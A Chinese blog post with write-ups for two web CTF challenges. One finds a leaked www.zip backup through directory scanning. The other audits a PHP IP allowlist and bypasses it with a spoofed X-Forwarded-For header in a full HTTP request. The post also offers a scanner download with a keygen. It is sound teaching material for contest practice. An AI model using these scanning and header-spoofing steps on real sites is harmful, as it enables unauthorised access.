CTF10月月赛WEB方向题解
浏览 1473 | 评论 0 | 字数 2671
卖女孩的小火柴
2019年10月27日
  • 猜猜flag在哪

    提示:你知道网站备份吗?

    题解

    这是一条简单的WEB源码泄漏题目,主要考察的是如何利用网站管理员的疏忽,直接通过备份/部署工具获得网站源码。

    原理也很简单,如果管理员在备份网站的时候,不慎备份到了网站目录内部,那样就会留下一个包含网站所有代码的压缩包。

    而这题是典型的win下备份的例子,WIN下网站目录多为www www-data site啊等网站目录,直接压缩就会压缩成www/www-data/site/ . zip/rar/7z 等等类似的文件

    而这题正好就是www.zip文件,地址是:http://139.199.72.13:20019/www.zip

    有人问:难道比赛的时候,我还得一个一个自己慢慢敲?来判断有没有这个文件?

    这时候就要用到工具了,常用的是御剑WEB扫描(相信做安全的应该没人不知道吧)和DirBuster,相比之下DirBuster更加专业,但需要配置java环境,而且自带的字典也太大了一些,相比之下御剑WEB更符合竞赛要求和国情。

    使用御剑选择DIR直接就扫描出来了

    捕获.png

    御剑的下载会放在文末,包括注册机

    相关延伸

    此类题目还有.git目录泄漏 SVN泄漏 phps等等,都属于直接的源码泄漏

    Gayhub

    提示:你知道全球最大交友网站吗

    题解

    这题是群主自己加的料,也同样是很简单的一道题目

    首先打开群主的github项目目录 https://github.com/Catsofsuffering/iBizSim-prediction-model

    看到目录中的 flag.txt,打开查看文件内容

    this is a SWCTF_Flag{139.199.72.13:20020}
    
    find the php bug
    
    <?php
    function GetIP(){
    if(!empty($_SERVER["HTTP_CLIENT_IP"]))
        $cip = $_SERVER["HTTP_CLIENT_IP"];
    else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))
        $cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
    else if(!empty($_SERVER["REMOTE_ADDR"]))
        $cip = $_SERVER["REMOTE_ADDR"];
    else
        $cip = "0.0.0.0";
    return $cip;
    }
    $GetIPs = GetIP();
    if ($GetIPs=="1.1.1.1"){
    echo "Great! Key is *********";
    }
    else{
    echo "Error!Your IP is not on the access list!";
    }
    ?>
    © 2019 GitHub, Inc.

    很明显的php代码审计,关键点就是那三个if

    典型的要求IP伪装,伪装方式是通过CLIENT_IP X_FORWARDED_FOR REMOTE_ADDR 三个header来决定客户端IP,并赋值给GetIPs变量

    个人习惯使用XFF头,直接上burp,burp到处都是,就不发了,萌新用免费版都够了

    GET / HTTP/1.1
    Host: 139.199.72.13:20020
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
    DNT: 1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close

    增加一行
    X-FORWARDED-FOR: 1.1.1.1
    变成这样

    GET / HTTP/1.1
    Host: 139.199.72.13:20020
    Pragma: no-cache
    X-FORWARDED-FOR: 1.1.1.1
    Cache-Control: no-cache
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
    DNT: 1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close

    拿到flag

    工具

    御剑WEB目录扫描优化版.7z

    本文作者:卖女孩的小火柴
    本文链接:https://www.shinenet.cn/archives/55.html
    最后修改时间:2019-11-15 19:55:40
    本站未注明转载的文章均为原创,并采用 CC BY-NC-SA 4.0 授权协议,转载请注明来源,谢谢!
    如果文章对您有帮助,不妨打赏杯可乐?微信-赞赏码
    评论
    如果可能,请填写真实邮箱,有回复会送至邮箱。请不要水评论,谢谢。
    textsms
    支持 Markdown 语法
    email
    link
    评论列表
    暂无评论